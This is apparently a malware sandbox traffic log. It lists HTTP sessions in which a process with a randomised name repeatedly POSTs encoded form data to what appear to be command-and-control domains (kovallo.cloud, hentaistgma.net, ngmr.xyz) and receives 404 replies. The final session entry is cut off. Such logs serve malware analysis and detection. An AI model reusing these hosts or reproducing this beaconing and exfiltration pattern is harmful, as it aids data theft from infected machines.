Oct 22, 2024 05:39:15.914376020 CEST	680	OUT	POST /whrh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.kovallo.cloud Origin: http://www.kovallo.cloud Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.kovallo.cloud/whrh/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 74 6c 69 2f 69 65 44 54 42 37 74 78 50 74 2b 75 4b 41 45 6b 64 41 4d 54 47 6f 34 33 6f 56 39 79 69 6f 30 47 6d 70 6f 39 35 39 5a 67 32 31 35 37 68 4d 54 64 39 54 64 44 51 45 65 57 57 71 5a 4a 66 4d 4d 54 52 72 4a 68 31 44 58 41 6b 43 4d 64 33 4d 4d 63 49 65 62 2b 76 6e 77 34 33 43 6a 41 68 64 32 61 69 6a 58 73 78 4a 71 42 64 59 73 47 6c 6d 65 46 52 31 6c 30 78 53 4a 52 72 47 57 38 76 35 32 4b 7a 42 4c 70 76 35 38 59 79 52 73 7a 68 45 58 4b 54 64 46 73 6d 42 4e 79 37 47 6e 63 70 63 67 6e 61 4d 59 41 38 6b 4e 57 37 4f 36 42 78 7a 61 73 66 6a 2b 35 53 52 52 39 72 4a 48 48 55 64 43 72 31 54 41 62 72 62 46 36 72 55 64 38 41 77 6a 5a 54 70 2b 55 6f 58 61 31 63 33 78 39 56 41 3d 3d Data Ascii: kT9p=tli/ieDTB7txPt+uKAEkdAMTGo43oV9yio0Gmpo959Zg2157hMTd9TdDQEeWWqZJfMMTRrJh1DXAkCMd3MMcIeb+vnw43CjAhd2aijXsxJqBdYsGlmeFR1l0xSJRrGW8v52KzBLpv58YyRszhEXKTdFsmBNy7GncpcgnaMYA8kNW7O6Bxzasfj+5SRR9rJHHUdCr1TAbrbF6rUd8AwjZTp+UoXa1c3x9VA==
Oct 22, 2024 05:39:16.762723923 CEST	292	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 22 Oct 2024 03:39:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49979	81.2.196.19	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:18.459836960 CEST	1693	OUT	POST /whrh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.kovallo.cloud Origin: http://www.kovallo.cloud Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.kovallo.cloud/whrh/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 74 6c 69 2f 69 65 44 54 42 37 74 78 50 74 2b 75 4b 41 45 6b 64 41 4d 54 47 6f 34 33 6f 56 39 79 69 6f 30 47 6d 70 6f 39 35 39 68 67 32 48 68 37 67 72 48 64 6e 54 64 44 54 45 65 47 57 71 59 54 66 4d 55 66 52 75 52 75 31 42 66 41 6d 67 45 64 78 39 4d 63 43 65 62 2b 74 6e 77 35 7a 43 6a 76 68 62 57 65 69 6e 7a 73 78 4a 71 42 64 62 6b 47 7a 45 32 46 4b 31 6b 47 79 53 4a 4e 76 47 58 52 76 35 65 77 7a 42 47 55 75 4a 63 59 79 78 38 7a 6e 6e 76 4b 59 64 46 75 6e 42 4e 36 37 47 71 47 70 63 74 63 61 4e 39 6c 38 6d 52 57 37 2f 48 6a 79 54 43 61 4d 67 71 75 4c 7a 74 5a 6a 65 62 59 66 65 75 34 32 41 73 70 69 61 39 6d 6d 7a 74 78 44 32 32 39 66 61 69 32 72 44 6e 71 57 44 59 71 49 45 6d 70 74 46 46 78 4a 79 7a 47 44 45 72 63 31 47 52 73 32 38 67 6d 37 78 6e 68 5a 58 68 72 53 4e 61 61 38 46 53 70 2f 76 6a 30 37 54 7a 34 39 66 53 52 68 72 50 53 50 51 37 4e 38 52 4c 49 69 4b 42 44 37 35 63 4e 32 47 30 6e 31 45 39 47 4e 6d 46 38 39 42 49 68 31 71 6b 54 72 6c 4f 55 54 70 44 6b 52 35 76 63 2f 79 6a 67 33 [TRUNCATED] Data Ascii: kT9p=tli/ieDTB7txPt+uKAEkdAMTGo43oV9yio0Gmpo959hg2Hh7grHdnTdDTEeGWqYTfMUfRuRu1BfAmgEdx9McCeb+tnw5zCjvhbWeinzsxJqBdbkGzE2FK1kGySJNvGXRv5ewzBGUuJcYyx8znnvKYdFunBN67GqGpctcaN9l8mRW7/HjyTCaMgquLztZjebYfeu42Aspia9mmztxD229fai2rDnqWDYqIEmptFFxJyzGDErc1GRs28gm7xnhZXhrSNaa8FSp/vj07Tz49fSRhrPSPQ7N8RLIiKBD75cN2G0n1E9GNmF89BIh1qkTrlOUTpDkR5vc/yjg3CO1ddkV9OMUG2B9w0YrvGaLHYCaaZxQuGYXKnjQWXIB51YBhYA5QKugUBcTyes994ua35TJazA9jtRp3ecaa7d6G+gH+B6N7FDpbrsByKOc0VK9U1CrhHr3TYd6Ibjfw/JOU3NZ27jZQNkbsvmDmBYbqFOKiuniZYhvRly5SgQPZ2FjI89nDfp1Se15OuFHsG3lyubgHEx/nJ5DDOd4SC7CkVBSV3wC/E0fJDYvq0TehlQta63MqGd823YNZnLEgUWtXn0NYr6RUMfZnib0z7A9/9pPoIepHAYhzfmlHojeARVTGlf1BiQReKWfelW6o/DY/OyUECmL8z8zbdQnLLt7gxtd1/Fd+sxZnj6t71y5hoctV96WDwf5S2etuXrPZpN165y5SvUhC1dCt+M4UwdWlflC7DB2dc7De20PT/a3oHBckreXnDkxGwW9LY1Yr1BnDYt0ZbqbO5XrmTohVns9ioSccxM3WJcsjE0/sy+DOTcfsJQxYlzpxMWyRWgRjinBcjyJwe5V2lz3VS95JcaMwmnXPJj5LKO0V2Qi85zk3CXBNJZmLfhWzhFdVFkHAXLwwf9Hp9SpEbkUPpkXziyGK9EKz+uSXFtD4alE4ElBm0vtDeEGxEwMeIYYh9rSONNiCUXD5C93J79vPtzujBKWRKi3e5l7wwC [TRUNCATED]
Oct 22, 2024 05:39:19.312671900 CEST	292	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 22 Oct 2024 03:39:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49980	81.2.196.19	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:21.003911972 CEST	407	OUT	GET /whrh/?kT9p=gnKfhumZE8ltP6GxVxsfSkoTPawS2VBtj7Y+npcg3eEMwAInvracgWsTZFjZCdkRXfgdTNdTzgCPtAFV2cUEHvPEtEwM8Ua8v+/63k/H/bL/ar8k5HyBDG0f7Adpr1HKjoqz2Rg=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.kovallo.cloud Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:39:21.844779015 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 22 Oct 2024 03:39:21 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49981	195.110.124.133	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:27.094897032 CEST	662	OUT	POST /qhr1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.hentaistgma.net Origin: http://www.hentaistgma.net Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.hentaistgma.net/qhr1/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 31 74 61 42 63 71 32 4f 31 7a 37 55 51 61 71 36 63 71 72 54 46 57 65 37 39 2b 44 6d 75 6b 42 70 61 70 35 68 63 61 58 57 71 35 51 75 6d 6f 59 4c 65 64 4d 74 77 76 72 34 6b 61 4d 53 31 6e 6e 51 79 2f 63 4d 57 66 51 46 63 68 6e 63 64 4a 4f 34 58 30 57 31 4b 65 2f 66 69 4f 50 38 67 4c 73 7a 4e 77 64 2b 70 38 69 6e 6b 6c 76 59 4d 58 73 72 73 74 67 4a 31 39 76 4d 6f 35 6c 55 53 58 64 77 78 6c 63 48 48 63 6b 67 53 55 4a 66 62 6d 53 65 68 6d 69 33 41 49 72 61 76 7a 77 49 45 73 42 35 57 59 72 47 76 51 70 34 37 6e 6c 78 61 67 63 36 69 55 69 72 73 75 43 34 70 46 4c 71 70 70 6c 57 5a 57 67 34 5a 33 67 43 50 7a 73 4a Data Ascii: kT9p=1taBcq2O1z7UQaq6cqrTFWe79+DmukBpap5hcaXWq5QumoYLedMtwvr4kaMS1nnQy/cMWfQFchncdJO4X0W1Ke/fiOP8gLszNwd+p8inklvYMXsrstgJ19vMo5lUSXdwxlcHHckgSUJfbmSehmi3AIravzwIEsB5WYrGvQp47nlxagc6iUirsuC4pFLqpplWZWg4Z3gCPzsJ
Oct 22, 2024 05:39:27.920222998 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:39:27 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49982	195.110.124.133	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:29.633151054 CEST	686	OUT	POST /qhr1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.hentaistgma.net Origin: http://www.hentaistgma.net Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.hentaistgma.net/qhr1/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 31 74 61 42 63 71 32 4f 31 7a 37 55 4b 37 61 36 65 4a 44 54 41 32 65 38 79 65 44 6d 67 30 41 69 61 70 46 68 63 65 4f 54 72 4b 30 75 6d 4a 6f 4c 66 66 6b 74 31 76 72 34 77 4b 4d 62 78 6e 6d 63 79 2f 52 7a 57 65 73 46 63 68 62 63 64 49 2b 34 58 44 43 79 59 2b 2f 52 74 75 50 36 71 72 73 7a 4e 77 64 2b 70 2f 65 4e 6b 6c 6e 59 4d 6e 38 72 74 49 55 49 32 39 76 4e 76 35 6c 55 57 58 63 33 78 6c 63 78 48 64 6f 4f 53 53 46 66 62 69 61 65 69 33 69 32 4c 49 72 63 77 6a 78 48 45 74 6f 54 66 59 43 33 78 47 78 4d 36 31 42 6d 66 57 64 67 2b 6e 69 49 2b 2b 69 36 70 48 54 59 70 4a 6c 38 62 57 59 34 4c 67 73 6c 41 48 4a 71 7a 35 61 55 58 6c 4f 62 6e 44 68 53 69 68 36 74 4f 79 77 64 56 77 3d 3d Data Ascii: kT9p=1taBcq2O1z7UK7a6eJDTA2e8yeDmg0AiapFhceOTrK0umJoLffkt1vr4wKMbxnmcy/RzWesFchbcdI+4XDCyY+/RtuP6qrszNwd+p/eNklnYMn8rtIUI29vNv5lUWXc3xlcxHdoOSSFfbiaei3i2LIrcwjxHEtoTfYC3xGxM61BmfWdg+niI++i6pHTYpJl8bWY4LgslAHJqz5aUXlObnDhSih6tOywdVw==
Oct 22, 2024 05:39:30.475660086 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:39:30 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49983	195.110.124.133	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:32.179908991 CEST	1699	OUT	POST /qhr1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.hentaistgma.net Origin: http://www.hentaistgma.net Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.hentaistgma.net/qhr1/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 31 74 61 42 63 71 32 4f 31 7a 37 55 4b 37 61 36 65 4a 44 54 41 32 65 38 79 65 44 6d 67 30 41 69 61 70 46 68 63 65 4f 54 72 4b 38 75 6d 37 51 4c 51 59 34 74 79 76 72 34 7a 4b 4d 57 78 6e 6d 52 79 2f 5a 2f 57 65 67 56 63 6e 58 63 63 71 61 34 56 78 36 79 54 2b 2f 52 76 75 50 37 67 4c 74 78 4e 77 4e 36 70 38 6d 4e 6b 6c 6e 59 4d 68 41 72 71 64 67 49 36 64 76 4d 6f 35 6c 49 53 58 63 54 78 6b 30 68 48 64 74 37 56 69 6c 66 63 43 4b 65 78 31 4b 32 47 49 72 65 78 6a 77 59 45 74 30 49 66 65 6e 62 78 47 73 62 36 32 64 6d 66 7a 6f 50 71 33 65 4f 39 2b 79 4e 36 58 44 50 69 65 31 2b 64 6e 68 47 62 53 6b 49 44 6a 35 6d 31 38 36 63 53 45 50 37 6b 54 67 2f 6d 57 62 4b 4c 53 41 5a 56 77 43 51 7a 47 73 45 31 41 66 69 31 64 4b 2b 44 39 4a 57 53 38 4e 43 5a 69 4e 6c 4b 35 64 47 58 6e 79 66 4e 34 74 4d 6b 35 41 4a 71 53 38 39 44 50 50 62 67 66 39 6b 4e 78 5a 75 72 67 43 6e 55 42 50 35 6c 50 68 4b 36 59 39 58 72 6f 61 7a 4c 48 6d 4e 59 6e 30 72 73 31 5a 47 77 72 37 71 62 4f 56 43 48 65 63 6a 61 38 6f 51 44 [TRUNCATED] Data Ascii: kT9p=1taBcq2O1z7UK7a6eJDTA2e8yeDmg0AiapFhceOTrK8um7QLQY4tyvr4zKMWxnmRy/Z/WegVcnXccqa4Vx6yT+/RvuP7gLtxNwN6p8mNklnYMhArqdgI6dvMo5lISXcTxk0hHdt7VilfcCKex1K2GIrexjwYEt0IfenbxGsb62dmfzoPq3eO9+yN6XDPie1+dnhGbSkIDj5m186cSEP7kTg/mWbKLSAZVwCQzGsE1Afi1dK+D9JWS8NCZiNlK5dGXnyfN4tMk5AJqS89DPPbgf9kNxZurgCnUBP5lPhK6Y9XroazLHmNYn0rs1ZGwr7qbOVCHecja8oQDrYunr2qpLxxEL26F54mqxodngx/W5qTzATqQPlwe9I+L7pzbZjjLX9n32v4L2z7o2M29VaXv2A+oH1/1TBl2cCgAI3PJHNrM/1OmZ1x9szRrFtrUSyzx6VPRd/5oWIq5UlPTx9wqWrOlD5YoQsdnSFdaQr7Rg7r+wuSputk1EeF+bKvicrsA40vYGLs8Vl8NRhmRPIiJxmGBM06gEijIDhX7amJ7/gGsX37DMde7c9iTw7Cz12ffiNS1vhUB6WgvkS5ff1Fn6oaozRaE3wa6HjZRnQfVokfSn2DAHGOlJpbqqzEQamvjfzHCGD+Ol0jNHXhKt7oievqpKy+h9o+JJ1vsIK5PZzelIKLhjzJDRixL/WMHcS4s+P5QLoqow8lrBbjI8d+M3V0JJnFIzT1u3065ANfINIEL13zb9dj2bmHWVcRr+NQ5l+tU1QsjtOtBQmIVqj0Yy9UD++YnuLtDIPXcNQxJdaW9Hllyar/rIdnCBPI/hg2uFlPogDSJ5zq21Ex4JvihoEuPFlSYaZhUfAx46WfAXXCy08ECK/FUjFrXGe5X0hxesQdqvNBT1WDkQI26MUTR0W1RiHiPJAKhVtHt26aA/QScnmeQKGEHp2igyQtMAmvgjhwiiBc+OD6mpQ3u4HbG4yNk2uSXI5X8Fsc/uKTpGrLKZ+ [TRUNCATED]
Oct 22, 2024 05:39:33.014045000 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:39:32 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49984	195.110.124.133	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:34.726413965 CEST	409	OUT	GET /qhr1/?kT9p=4vyhfeGJy1HoJfLgdJHMJiiF5ffL7B9jTKxpb/iJoZFHl/RjV/1B5t3r6p0bkAeKssIvV+AadX2UVbSNYhzuXtrdtufHlrgwCycB7eSZz2zZKA9MpZFsx/+zuOBsemQBs3csDLA=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.hentaistgma.net Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:39:35.570965052 CEST	367	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Oct 2024 03:39:35 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49985	54.67.87.110	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:41.082259893 CEST	641	OUT	POST /ntib/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.ngmr.xyz Origin: http://www.ngmr.xyz Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.ngmr.xyz/ntib/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 33 69 70 49 49 4d 44 31 34 67 61 50 6e 57 58 51 64 68 72 35 51 59 7a 2f 2b 41 2f 71 58 72 47 33 70 2b 43 55 63 58 32 79 71 6c 63 68 61 42 4a 66 6a 79 31 6b 72 72 6c 74 7a 6d 36 69 42 76 6a 30 32 6b 65 42 51 6e 39 33 36 4a 4c 78 42 61 4d 51 6b 58 71 71 58 69 37 2f 70 36 76 53 54 30 63 66 51 72 6d 59 6c 32 75 6d 6d 67 59 6d 55 65 33 50 4f 59 79 54 42 31 45 64 4a 4c 4f 47 45 33 79 7a 48 6a 30 57 58 34 7a 45 49 75 50 63 70 56 61 6d 4a 77 7a 61 4a 71 4b 62 32 38 36 78 2f 4a 6c 43 66 6a 72 57 4d 2b 58 71 6f 33 2b 44 6b 44 57 63 55 4a 54 61 55 6a 4e 63 68 34 42 45 53 55 7a 63 73 59 76 43 6b 65 37 45 33 58 73 71 Data Ascii: kT9p=3ipIIMD14gaPnWXQdhr5QYz/+A/qXrG3p+CUcX2yqlchaBJfjy1krrltzm6iBvj02keBQn936JLxBaMQkXqqXi7/p6vST0cfQrmYl2ummgYmUe3POYyTB1EdJLOGE3yzHj0WX4zEIuPcpVamJwzaJqKb286x/JlCfjrWM+Xqo3+DkDWcUJTaUjNch4BESUzcsYvCke7E3Xsq
Oct 22, 2024 05:39:41.757124901 CEST	550	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Tue, 22 Oct 2024 04:03:12 GMT X-Varnish: 1435552209 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49986	54.67.87.110	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
